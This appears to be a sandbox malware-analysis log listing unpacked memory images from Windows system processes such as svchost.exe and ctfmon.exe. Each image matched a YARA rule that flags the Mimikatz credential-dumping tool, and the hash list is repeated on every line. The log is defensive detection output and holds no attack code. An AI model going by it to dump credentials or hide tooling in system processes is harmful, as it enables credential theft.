      Source: 15.0.ctfmon.exe.9a2c68.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.9a2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.53.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.9a2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.27.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8d7468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.517468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 39.0.WUDHostServices.exe.1270000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.2.ctfmon.exe.7c7468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.522c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.2.dllhost.exe.2e42c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.790000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.4b77268.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.517468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.2.SearchProtocolHost.exe.2fe2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.54.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.21.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.28.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.2.svchost.exe.862c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 39.2.WUDHostServices.exe.1270000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e42c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.517468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.13.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.2.svchost.exe.857468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.24.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.28a2c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.2.svchost.exe.862c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.2.ctfmon.exe.7d2c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 30.2.WUDHostServices.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8e2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 30.0.WUDHostServices.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.787468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
